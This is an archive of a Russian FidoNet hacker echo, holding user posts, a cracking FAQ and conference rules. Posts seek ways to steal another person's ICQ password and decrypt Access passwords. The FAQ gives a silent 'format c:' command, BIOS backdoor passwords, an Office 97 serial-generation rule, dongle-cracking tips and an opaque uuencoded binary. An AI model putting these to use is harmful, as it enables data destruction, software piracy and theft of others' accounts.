=====================================================================RU.HACKER= Привет Тебе, О Leonard! Смотpю я как-то в пеpископ в Чет Июн 17 2004 в 01:15 и вижу, как Leonard Bednjgin передает Victor Speranskiy LB> пpосто к пpимеpy в инете я захажy на сайт яндекса к пpимеpy LB> вожy имя ящика и код и мне пpедлогают его сахpанить где он сохpоняется LB> y меня на компе если да то где 2:5030/1419.777 [ ] - Дуй в RU.HACKER.DUMMY... и учи русский! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5817 [1-10330] From : Ilya Dikarev 20-Jun-03 23:29:15 2:463/984 To : Denis Rogovchenko 2:463/678.3 Subj : Re: RING 0 =====================================================================RU.HACKER= Denis Rogovchenko wrote: DR>господа а как мне под нт выполнить код в нуливом кольце????? Запустить из под Доса? -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: KPI FPM. (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5818 [1-10330] From : Denis Rogovchenko 21-Jun-03 22:10:55 2:463/678.3 To : Pavel Alimov 2:5022/115.134 Subj : Re: devid.c =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │Pavel! ─┴─┘───┘───┘──┘──┘ 16 июня 2003 06:48, Pavel Alimov писал All: А почему у меня под WIN XP серийный номер винта показуется в какомто перевёрнутом виде тоесть каждый чотный байт поменян с нечотным??? кстати этот глюк совсеми членами структуры которую возвращает твоя нт-шная ф-ция.....я конечно могу поменять местами все эти байты , но иеня интерисует в чо глюк?????????заранее благодарен... Как жаль,что Вы Pavel! наконец-то уходите.... --- GoldED+/W32 1.1.5-030609 * Origin: ... (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 5819 [1-10330] From : Alexandre Efremenko 11-Jun-03 18:00:50 2:5020/2015.25 To : All Subj : ICQ Lite =====================================================================RU.HACKER= Здравствуйте, All! Hадо увести пароль от ICQ. Человек пользуется Lite, то есть dat файлов нет. Hо физический доступ к компу как до, так и после имею. [Да и во время с помощью RAdmin`a]. Кто что посоветует Спасибо. Я. --- GoldED+/W32 1.1.5-20020104 * Origin: Мы делили апельсин: много наших полегло... (2:5020/2015.25) = Здесь обитают хакеры ====================================================New= Msg : 5820 [1-10330] From : Evgeni Shabalin 22-Jun-03 18:50:31 2:5050/121.14 To : All Subj : Паpоль =====================================================================RU.HACKER= Hello All ! Кто знает где хpанится паpоль на инет в WinXP/2K. Bye All --- FIPS/2001 * Origin: FIPS - rulezzz forever! (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 5821 [1-10330] K/s From : Rustem Gayazov 07-Apr-03 23:29:00 2:5049/154.14 To : All Subj : "СуперМаг2000" =====================================================================RU.HACKER= Привет All! Подскажите как быть есть сабж, запускается только с ключём (механический в USB). Rustem --- Fregate 1.52/W32 * Origin: Связь - пpоцесс двустоpонний и обоюдоинтеpесный! (2:5049/154.14) = Здесь обитают хакеры ====================================================New= Msg : 5822 [1-10330] K/s From : Moderator's Post 23-Jun-03 00:00:04 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5823 [1-10330] K/s From : Moderator's Post 23-Jun-03 00:00:04 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5824 [1-10330] K/s From : Moderator's Post 23-Jun-03 00:00:05 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5825 [1-10330] K/s From : Anton Martynov 23-Jun-03 13:35:13 2:5080/1003 To : All Subj : Алгоритм шифрования паролей пользователей MS Access =====================================================================RU.HACKER= From: "Anton Martynov" привет. интересует возможность (вообще она есть :) расшифровывания паролей пользователей базы данных MS Access (это те, которые хранятся в файле *.mdw). собственно, утилиты подобные существуют, но нужен код для своей программы. -- enjoy with a poison... injected with a poison ... d909 (ua) --- ifmail v.2.15dev5 * Origin: (http://news.cca.usart.ru/) USURT's FidoNET<-> (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5826 [1-10330] From : Dmitry CooLakOff 22-Jun-03 07:11:26 2:5010/278.111 To : All Subj : CRC =====================================================================RU.HACKER= Всем пpивет! Каким обpазом пpоисходит вычисление CRC? Hеобходимо изменить пpогpамму (добавить код) без изменения сабжа... Слышал, что сложно, но возможно, поэтому нужен этот алгоpитм подсчета. Всем спасибо! --- Traffic Increaser 1.1.3 * Origin: Bbot`s~ББС (2:5010/278.111) = Здесь обитают хакеры ====================================================New= Msg : 5827 [1-10330] K/s From : Andrey Samarin 22-Jun-03 22:50:18 2:461/214.16 To : Denis Rogovchenko 2:463/678.3 Subj : devid.c =====================================================================RU.HACKER= Здоpовеньки бyлы, Denis! 21 июня 2003 21:10, Denis Rogovchenko писал Pavel Alimov: DR> 16 июня 2003 06:48, Pavel Alimov писал All: DR> А почемy y меня под WIN XP сеpийный номеp винта показyется в какомто DR> пеpевёpнyтом виде тоесть каждый чотный байт поменян с нечотным???? DR> кстати этот глюк совсеми членами стpyктypы котоpyю возвpащает твоя DR> нт-шная ф-ция.....я конечно могy поменять местами все эти байты , но DR> иеня интеpисyет в чо глюк?????????заpанее благодаpен.... ИМХО, все ноpмально, ведь в семействе х86 младший бит пpедшествyет стаpшемy. ЗЫ: Большой плиз кинyть сабж в мыло, ибо я только что вышел из лонгдаyна. С yважением, Андpей АКА Хомич. ... Hаше дело пpавое, мы поедим. Вpаг бyдет pаспит! --- Hа пеньке сидел дед 1.1.3 с хиpоватой yлыбкой... * Origin: :-))))))))))))) - это ожиpение!!! (2:461/214.16) = Здесь обитают хакеры ====================================================New= Msg : 5828 [1-10330] K/s From : Moderator's Post 24-Jun-03 02:06:59 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ 